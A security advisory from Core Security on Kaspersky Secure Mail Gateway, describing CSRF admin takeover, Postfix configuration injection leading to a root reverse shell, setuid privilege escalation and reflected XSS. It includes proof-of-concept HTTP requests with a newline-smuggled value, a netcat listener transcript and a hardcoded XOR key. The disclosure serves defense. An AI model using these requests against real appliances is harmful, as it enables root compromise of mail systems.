Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ Kaspersky Secure Mail Gateway Multiple Vulnerabilities 1. *Advisory Information* Title: Kaspersky Secure Mail Gateway Multiple Vulnerabilities Advisory ID: CORE-2017-0010 Advisory URL: http://www.coresecurity.com/advisories/kaspersky-secure-mail-gateway-multiple-vulnerabilities Date published: 2018-02-01 Date of last update: 2018-02-01 Vendors contacted: Kaspersky Lab Release mode: Coordinated release 2. *Vulnerability Information* Class: Cross-Site Request Forgery [CWE-352], Improper Neutralization of Special Elements in Output Used by a Downstream Component [CWE-74], Improper Privilege Management [CWE-269], Improper Neutralization of Input During Web Page Generation [CWE-79] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-pending-assignment-1, CVE-pending-assignment-2, CVE-pending-assignment-3, CVE-pending-assignment-4 3. *Vulnerability Description* >From Kaspersky Labs website: Kaspersky Secure Mail Gateway [1] gives you a fully integrated email system; mail security solution - including anti-spam, anti-malware, anti-phishing and more - in a single virtual appliance. It's easy to install and manage - so you save time on day-to-day mail and mail security tasks, while we deliver award-winning security that helps you keep your business safe and boost user productivity. Multiple vulnerabilities were found in the Kaspersky Mail Gateway Web Management Console. It is possible for a remote attacker to abuse these vulnerabilities and gain command execution as root. 4. *Vulnerable Packages* Kaspersky Secure Mail Gateway 1.1.0.379 Other products and versions might be affected, but they were not tested. 5. *Vendor Information, Solutions and Workarounds* Kaspersky Labs published the following advisory . https://support.kaspersky.com/vulnerability.aspx?el=12430#010218 6. *Credits* These vulnerabilities were discovered and researched by Leandro Barragan from Core Security Consulting Services. The publication of this advisory was coordinated by Alberto Solino from Core Advisories Team. 7. *Technical Description / Proof of Concept Code* Kaspersky Secure Mail Gateway is a virtual appliance designed to be deployed inside the organization's network infrastructure. It comes bundled with a Web Management Console to monitor the application status and manage its operation. This Management Console provides no cross-site request forgery protection site-wide, which could result in administrative account takeover as shown in 7.1. In addition, an attacker who manages to get access to the Web Console could gain command execution as root (7.2) by injecting arbitrary content into the appliance's Postfix configuration. It is also possible to elevate privileges from kluser to root (7.3) by abusing a setuid binary shipped with the appliance, which executes a script located on an attacker-controlled location with root privileges. Apart from this, a reflected cross-site scripting vulnerability (7.4) was found which affects the Management Console. 7.1. *Cross-site Request Forgery leading to Administrative account takeover* [CVE-pending-assignment-1] There are no Anti-CSRF tokens in any forms on the Web interface. This would allow an attacker to submit authenticated requests when an authenticated user browses an attacker-controlled domain. The "Import Application Settings" feature is particularly interesting because it allows users to restore a backup file that overwrites the appliance's configuration. A settings backup file contains five zlib segments: /----- $ binwalk KSMG_settings.kz DECIMAL HEXADECIMAL DESCRIPTION ------------------------------------------------------------------------------ 16 0x10 Zlib compressed data, default compression 39 0x27 Zlib compressed data, default compression 2242 0x8C2 Zlib compressed data, default compression 2268 0x8DC Zlib compressed data, default compression 3072 0xC00 Zlib compressed data, default compression -----/ The last segment is a compressed backup of /var/opt/kaspersky/klms/db /passwd, which contains a list of usernames, passwords, and profiles, for example: /----- # cat /var/opt/kaspersky/klms/db/passwd Administrator:7{E{I'}Ap{RpY~t/V28\lZ&,FM&97s5`6f5e51bd7ade638785f5e7476351839e:admin -----/ An attacker can craft a backup file that contains its own passwd file, and then submit it by abusing the CSRF vulnerability. The appliance then overwrites the original passwd file giving the attacker access to Administrator account. The following proof-of-concept request restores only account information in order to avoid changing appliance's current configuration. Please note that the file contents were removed to make it more readable. /----- POST /ksmg/cgi-bin/klwi?action=importSettings&callback=CC3262C5 HTTP/1.1 Host: server User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: multipart/form-data; boundary=---------------------------3463969741915053213976213766 Content-Length: 3935 Referer: https://server/ksmg/ Cookie: SID=7362ED7771E7213F0EFCE85B430E240D Connection: close Upgrade-Insecure-Requests: 1 -----------------------------3463969741915053213976213766 Content-Disposition: form-data; name="data" {"importSections":{"importWebPasswords":true,"importMachineIndependent":false,"importMachineDependent":false,"machineDependent":{"importTraces":false,"importProxy":false,"importAuth":false,"importBackup":false,"backupImportSection":{"importFileStorage":false},"importScan":false,"scanImportSection":{"importFilterSocket":false},"importUpdater":false,"importQuarantine":false},"importRules":false,"importPersonal":false}} -----------------------------3463969741915053213976213766 Content-Disposition: form-data; name="fileContent"; filename="KSMG_settings.kz" Content-Type: application/octet-stream [...Tampered configuration file...] -----------------------------3463969741915053213976213766-- -----/ 7.2. *Configuration file injection leading to Code Execution as Root* [CVE-pending-assignment-2] Using the Web Management Console it is possible to add a "BCC Address for all Messages". This configuration parameter is written verbatim to the appliance's Postfix main.cf configuration file. By adding LF characters to this parameter, it is possible to inject a configuration parameter that would allow an attacker to execute arbitrary commands on the appliance as root. The following request injects arbitrary configuration settings into /etc/postfix/main.cf: /----- POST /ksmg/cgi-bin/klwi?action=setMtaSettings HTTP/1.1 Host: server User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: https://server/ksmg/ Content-Length: 1541 Cookie: SID=7362ED7771E7213F0EFCE85B430E240D Connection: close data={"alwaysBcc":"test@test.com\nmulti_instance_enable=yes\nmulti_instance_wrapper=\/tmp\/klms-appliance-upgrade\/upgrade.py\nmulti_instance_directories=\/tmp","mydomain":"localdomain",[...SNIPPED...] -----/ The resulting file looks as follows: /----- $ cat /etc/postfix/main.cf ... always_bcc = test@test.com multi_instance_enable=yes multi_instance_wrapper=/tmp/klms-appliance-upgrade/upgrade.py multi_instance_directories=/tmp ... -----/ After that request is sent, postfix is automatically restarted, and the file pointed by multi_instance_wrapper is executed. In this proof- of-concept that parameter points to a python reverse shell: /----- $ nc -lvvvp 1080 Listening on [0.0.0.0] (family 0, port 1080) Connection from [server] port 1080 [tcp/socks] accepted (family 2, sport 42776) sh: no job control in this shell sh-4.1# id id uid=0(root) gid=497(klusers) groups=497(klusers),90(postdrop) -----/ Please note that while abusing this behavior would allow attackers to execute any binary on the system, no arguments can be passed to it. In order to overcome this we abused another Web Console functionality to upload a Python script to the file system. That procedure is described next. An attacker can write to /tmp/klms-appliance-upgrade/ using the Web Console using System Upgrade functionality. This feature takes an upgrade file (i.e. a KTGZ file), decodes it, and unpacks it on /tmp/klms-appliance-upgrade/. KTGZ files can be crafted by creating a TAR.GZ file with a malicious upgrade.py file inside it, and then XORing it with key 0xDF23B1ED. This key is static and hardcoded on system's binaries. When this file is uploaded using the Web Console, the upgrade process will fail, as it lacks Kaspersky signature files. However, the content of the rogue upgrade file (including the modified upgrade.py file used on this proof-of-concept) will remain on /tmp/klms-appliance-upgrade/. It is worth noting that file's permissions are conserved, so we can upload files with the executable bit set. 7.3. *Local Privilege Escalation* [CVE-pending-assignment-3] There is a setuid root binary located on /opt/kaspersky/klms-appliance/libexec/upgrade/: /----- $ ls -lha /opt/kaspersky/klms-appliance/libexec/upgrade/upgrade_launcher -rws--x--- 1 root klusers 7,6K sep 24 2015 /opt/kaspersky/klms-appliance/libexec/upgrade/upgrade_launcher -----/ This program looks for a python script once executed: /----- $ /opt/kaspersky/klms-appliance/libexec/upgrade/upgrade_launcher /usr/bin/python: can't open file '/tmp/klms-appliance-upgrade/upgrade.py': [Errno 2] No such file or directory -----/ /tmp/klms-appliance-upgrade/ directory is writeable by kluser by default. If an attacker manages to run commands on the appliance as kluser, s/he could abuse this behaviour to elevate privileges to root by writing a malicious script on the aforementioned path and running upgrade_launcher binary. 7.4. *Reflected Cross-Site Scripting* [CVE-pending-assignment-4] The callback parameter of the importSettings action method is vulnerable to cross-site scripting. /----- https://server/ksmg/cgi-bin/klwi?action=importSettings&callback=CC3262C5